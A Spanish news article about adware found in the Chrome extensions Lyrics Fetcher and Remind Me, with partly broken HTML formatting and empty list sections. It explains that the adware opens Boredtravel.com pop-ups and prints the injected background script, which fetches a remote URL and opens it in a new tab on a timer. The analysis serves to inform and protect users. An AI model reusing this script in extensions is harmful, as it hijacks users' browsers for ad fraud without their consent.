Un adware que abre ventanas emergentes en el sitio Boredtravel.com se ha colado en algunas extensiones de Chrome. Aqu\u00ed se explica c\u00f3mo detectar y eliminar este virus.<\/p>\n\n\n\n\n\n
Se insert\u00f3 un script malicioso en la \u00faltima actualizaci\u00f3n de varias extensiones de Chrome. Este script abre el sitio Boredtravel.com sin el conocimiento de los usuarios, a intervalos regulares. Las extensiones infectadas con este script son Lyrics Fetcher y Remind Me, del desarrollador helpfulwebtech.<\/p>\n\n\n\n
Este adware no es peligroso ya que solo abre una p\u00e1gina de publicidad. Sin embargo, es inquietante permitir que ocurra esta pr\u00e1ctica dudosa.<\/p>\n\n\n\n
Para identificar el adware, basta con analizar el comportamiento de su navegador:<\/p>\n\n\n\n
La eliminaci\u00f3n es simple y r\u00e1pida:<\/p>\n\n\n\n
Se han identificado casos para extensiones Letra de Fetcher<\/a> y Recu\u00e9rdame<\/a>, pero puede que no sean los \u00fanicos. Es posible que el adware tambi\u00e9n est\u00e9 presente en la extensi\u00f3n. Modo beb\u00e9<\/a>, una extensi\u00f3n del mismo desarrollador. <\/p>\n\n\n\n No est\u00e1 claro si el desarrollador de esta extensi\u00f3n agreg\u00f3 deliberadamente el script malicioso, o si fue realizado por un hacker. Como precauci\u00f3n, le recomendamos que deshabilite o elimine todas las extensiones de este desarrollador. <\/p>\n\n\n\n Las extensiones han sido reportadas a Google, sabremos m\u00e1s pronto. Si otras extensiones tienen el mismo problema, no dudes en hac\u00e9rnoslo saber.<\/p>\n\n\n\n Aqu\u00ed hay algunas extensiones alternativas:<\/p>\n\n\n\n El principio es simple, el desarrollador o un pirata inform\u00e1tico ha agregado un script a las extensiones en cuesti\u00f3n. Este script, que se ejecuta en segundo plano, le indica al navegador que abra una p\u00e1gina de publicidad a intervalos regulares. El objetivo para el desarrollador o hacker es que la p\u00e1gina de destino se abra un cierto n\u00famero de veces. Esto aumenta el n\u00famero de visitas al sitio Boredtravel.com y aumenta los ingresos relacionados con \u00e9l.<\/p>\n\n\n\n Aqu\u00ed est\u00e1 el c\u00f3digo que se agreg\u00f3 en la extensi\u00f3n. He a\u00f1adido comentarios en verde, para que se entienda mejor<\/p>\n\n\nReemplazar extensiones<\/h3>\n\n\n\n
El trabajo de Boredtravel.com<\/h2>\n\n\n\n
\n<script>\n\n\n\/\/ fonction qui ouvre un pop-up 6 minutes apr\u00e8s le d\u00e9marrage de Chrome\n setTimeout(function () { \n $.ajax({\n url: "https:\/\/demo7530752.mockable.io\/url",\n \/* cette URL g\u00e9n\u00e8re un lien du type\n https:\/\/ourshort.com\/?g\/BNHzHJJ *\/\n async: false,\n dataType: 'json',\n success: function (data) {\n\n \/\/ouverture du lien g\u00e9n\u00e9r\u00e9, qui redirige ensuite vers Boredtravel.com\n var newURL = data.msg;\n chrome.tabs.create({ url: newURL }); ;\n intervalWebsite() \/* appel de la fonction qui ouvre\n un pop-up toutes les 4 heures *\/\n }\n });\n }, 6 * 60 * 1000) \/\/ 6 x 60 x 1000 millisecondes = 6 min\n\n\n\/\/ fonction qui ouvre un pop-up toutes les 4 heures\n function intervalWebsite() {\n setInterval(function () {\n $.ajax({\n url: "https:\/\/demo7530752.mockable.io\/url",\n \/\/ comme dans la premi\u00e8re fonction\n async: false,\n dataType: 'json',\n success: function (data) {\n\n \/\/ comme dans la premi\u00e8re fonction\n var newURL = data.msg;\n chrome.tabs.create({ url: newURL }); ;\n\n }\n });\n }, 240 * 60 * 1000)\/\/ 240 x 60 x 1000 millisecondes = 240 min = 4h\n }\n\n\n<\/script>\n<\/pre><\/div>\n\n\n